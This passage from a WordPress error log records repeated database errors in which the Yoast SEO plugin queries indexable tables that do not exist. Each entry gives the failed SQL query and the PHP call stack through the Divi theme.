Yoast\WP\SEO\Context\Meta_Tags_Context->generate_site_url, Yoast\WP\SEO\Repositories\Indexable_Repository->find_for_home_page, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_home_page, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, Yoast\WP\SEO\Models\Indexable->save, Yoast\WP\Lib\Model->save, Yoast\WP\Lib\ORM->save, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query INSERT INTO <code>wp_tz3c246s0h_yoast_indexable</code> (<code>object_id</code>, <code>object_type</code>, <code>object_sub_type</code>, <code>permalink</code>, <code>primary_focus_keyword_score</code>, <code>readability_score</code>, <code>is_cornerstone</code>, <code>is_robots_noindex</code>, <code>is_robots_nofollow</code>, <code>is_robots_noimageindex</code>, <code>is_robots_noarchive</code>, <code>is_robots_nosnippet</code>, <code>open_graph_image</code>, <code>open_graph_image_id</code>, <code>open_graph_image_source</code>, <code>open_graph_image_meta</code>, <code>twitter_image</code>, <code>twitter_image_id</code>, <code>twitter_image_source</code>, <code>primary_focus_keyword</code>, <code>canonical</code>, <code>title</code>, <code>description</code>, <code>breadcrumb_title</code>, <code>open_graph_title</code>, <code>open_graph_description</code>, <code>twitter_title</code>, <code>twitter_description</code>, <code>author_id</code>, <code>post_parent</code>, <code>number_of_pages</code>, <code>post_status</code>, <code>is_protected</code>, <code>is_public</code>, <code>has_public_posts</code>, <code>blog_id</code>, <code>schema_page_type</code>, <code>schema_article_type</code>, <code>permalink_hash</code>, <code>created_at</code>, <code>updated_at</code>) VALUES ('1336', 'post', 'page', 'https://www.drumcafe.com/teambuilding/', NULL, '30', '0', NULL, '0', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'Teambuilding', NULL, NULL, NULL, NULL, '1', '0', NULL, 'publish', '0', NULL, NULL, '1', NULL, NULL, '38:e76a4385df09196c016725e6d51a113d', '2020-11-20 21:01:38', '2020-11-20 21:01:38') made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, Yoast\WP\SEO\Models\Indexable->save, Yoast\WP\Lib\Model->save, Yoast\WP\Lib\ORM->save, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT * FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_id</code> = '1' AND <code>object_type</code> = 'user' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->updated_indexable, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->update_has_public_posts, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT * FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_id</code> = '1' AND <code>object_type</code> = 'user' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->updated_indexable, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->update_has_public_posts, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable_hierarchy' doesn't exist for query SELECT <code>indexable_id</code> FROM <code>wp_tz3c246s0h_yoast_indexable_hierarchy</code> WHERE <code>ancestor_id</code> = '0' made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Ancestor_Watcher->reset_children, Yoast\WP\SEO\Repositories\Indexable_Hierarchy_Repository->find_children, Yoast\WP\Lib\ORM->find_array, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query INSERT INTO <code>wp_tz3c246s0h_yoast_indexable</code> (<code>object_id</code>, <code>object_type</code>, <code>permalink</code>, <code>title</code>, <code>description</code>, <code>is_cornerstone</code>, <code>is_robots_noindex</code>, <code>is_robots_nofollow</code>, <code>is_robots_noarchive</code>, <code>is_robots_noimageindex</code>, <code>is_robots_nosnippet</code>, <code>is_public</code>, <code>has_public_posts</code>, <code>blog_id</code>, <code>open_graph_image</code>, <code>open_graph_image_id</code>, <code>open_graph_image_source</code>, <code>open_graph_image_meta</code>, <code>twitter_image</code>, <code>twitter_image_id</code>, <code>twitter_image_source</code>, <code>permalink_hash</code>, <code>created_at</code>, <code>updated_at</code>) VALUES ('1', 'user', 'https://www.drumcafe.com/author/drumcafe/', NULL, NULL, '0', '0', NULL, NULL, NULL, NULL, NULL, '0', '1', 'https://secure.gravatar.com/avatar/11fe64f45c58ca2662e3b7534d6aff86?s=500&d=mm&r=g', NULL, 'gravatar-image', NULL, 'https://secure.gravatar.com/avatar/11fe64f45c58ca2662e3b7534d6aff86?s=500&d=mm&r=g', NULL, 'gravatar-image', '41:cd80de8e2e6d3ce7e7ee2d7c9d9ebcaf', '2020-11-20 21:01:39', '2020-11-20 21:01:39') made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->updated_indexable, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->update_has_public_posts, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, Yoast\WP\SEO\Models\Indexable->save, Yoast\WP\Lib\Model->save, Yoast\WP\Lib\ORM->save, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable_hierarchy' doesn't exist for query SELECT <code>indexable_id</code> FROM <code>wp_tz3c246s0h_yoast_indexable_hierarchy</code> WHERE <code>ancestor_id</code> = '0' made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Ancestor_Watcher->reset_children, Yoast\WP\SEO\Repositories\Indexable_Hierarchy_Repository->find_children, Yoast\WP\Lib\ORM->find_array, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query UPDATE <code>wp_tz3c246s0h_yoast_indexable</code> SET <code>has_public_posts</code> = '0', <code>permalink</code> = 'https://www.drumcafe.com/author/drumcafe/', <code>permalink_hash</code> = '41:cd80de8e2e6d3ce7e7ee2d7c9d9ebcaf', <code>updated_at</code> = '2020-11-20 21:01:39' WHERE <code>id</code> = '0' made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->updated_indexable, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->update_has_public_posts, Yoast\WP\SEO\Models\Indexable->save, Yoast\WP\Lib\Model->save, Yoast\WP\Lib\ORM->save, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT * FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_id</code> = '1733' AND <code>object_type</code> = 'post' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT * FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_id</code> = '1' AND <code>object_type</code> = 'user' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->updated_indexable, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->update_has_public_posts, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT <code>id</code> FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_type</code> = 'post' AND <code>object_sub_type</code> = 'attachment' AND <code>post_status</code> = 'inherit' AND <code>post_parent</code> = '1447' AND <code>has_public_posts</code> IS NOT NULL made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->updated_indexable, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->update_has_public_posts, Yoast\WP\SEO\Helpers\Post_Helper->update_has_public_posts_on_attachments, Yoast\WP\Lib\ORM->find_array, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT * FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_id</code> = '1733' AND <code>object_type</code> = 'post' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT * FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_id</code> = '1' AND <code>object_type</code> = 'user' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->updated_indexable, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->update_has_public_posts, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT <code>id</code> FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_type</code> = 'post' AND <code>object_sub_type</code> = 'attachment' AND <code>post_status</code> = 'inherit' AND <code>post_parent</code> = '1447' AND <code>has_public_posts</code> IS NOT NULL made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->updated_indexable, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->update_has_public_posts, Yoast\WP\SEO\Helpers\Post_Helper->update_has_public_posts_on_attachments, Yoast\WP\Lib\ORM->find_array, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query INSERT INTO <code>wp_tz3c246s0h_yoast_indexable</code> (<code>object_id</code>, <code>object_type</code>, <code>permalink</code>, <code>title</code>, <code>description</code>, <code>is_cornerstone</code>, <code>is_robots_noindex</code>, <code>is_robots_nofollow</code>, <code>is_robots_noarchive</code>, <code>is_robots_noimageindex</code>, <code>is_robots_nosnippet</code>, <code>is_public</code>, <code>has_public_posts</code>, <code>blog_id</code>, <code>open_graph_image</code>, <code>open_graph_image_id</code>, <code>open_graph_image_source</code>, <code>open_graph_image_meta</code>, <code>twitter_image</code>, <code>twitter_image_id</code>, <code>twitter_image_source</code>, <code>permalink_hash</code>, <code>created_at</code>, <code>updated_at</code>) VALUES ('1', 'user', 'https://www.drumcafe.com/author/drumcafe/', NULL, NULL, '0', '0', NULL, NULL, NULL, NULL, NULL, '0', '1', 'https://secure.gravatar.com/avatar/11fe64f45c58ca2662e3b7534d6aff86?s=500&d=mm&r=g', NULL, 'gravatar-image', NULL, 'https://secure.gravatar.com/avatar/11fe64f45c58ca2662e3b7534d6aff86?s=500&d=mm&r=g', NULL, 'gravatar-image', '41:cd80de8e2e6d3ce7e7ee2d7c9d9ebcaf', '2020-11-20 21:01:39', '2020-11-20 21:01:39') made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->updated_indexable, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->update_has_public_posts, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, Yoast\WP\SEO\Models\Indexable->save, Yoast\WP\Lib\Model->save, Yoast\WP\Lib\ORM->save, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query UPDATE <code>wp_tz3c246s0h_yoast_indexable</code> SET <code>permalink</code> = 'https://www.drumcafe.com/conferences/', <code>permalink_hash</code> = '37:97a880684a30ae9f40cedae4cc6f7f4a', <code>updated_at</code> = '2020-11-20 21:01:39' WHERE <code>id</code> = '0' made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->updated_indexable, Yoast\WP\SEO\Models\Indexable->save, Yoast\WP\Lib\Model->save, Yoast\WP\Lib\ORM->save, Yoast\WP\Lib\ORM::execute
